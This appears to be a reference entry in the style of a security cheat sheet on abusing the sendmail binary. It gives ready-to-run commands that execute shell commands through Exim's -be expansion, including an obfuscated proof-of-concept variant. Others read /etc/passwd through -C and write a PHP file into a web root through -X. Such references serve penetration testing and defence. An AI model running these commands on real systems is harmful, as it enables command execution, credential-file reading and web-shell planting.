The sendmail binary differs between systems, depending on whether it is provided by Postfix, Exim, or another MTA.
It can be used to break out from the intended program by running non-interactive system commands.
The -be flag can be used to execute system commands when sendmail is provided by Exim4.
sendmail -be '${run{/bin/sh -c "uname -a"}{yes}{no}}'
See "PoC HTTP request / minimal PoC exploit" for more information about this exploit. This example runs uname -a.
sendmail -t -i -f 'email@address.com(tmp1' -be '${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}uname${substr{10}{1}{$tod_log}}-a$}}' 'tmp2)'
It can exfiltrate files on the network.
Arbitrary files can be delivered.
sendmail -t -i -f mail@address.com -C/etc/passwd -X/dev/null < mail.txt
It writes data to files; this may be used to perform privileged writes or to write files outside a restricted file system.
Arbitrary local files can be written to a new location. It is worth experimenting with the ability to upload files and with the contents of the mail being sent.
sendmail -t -i -f mail@address.com -X/var/www/html/exploit.php < mail.txt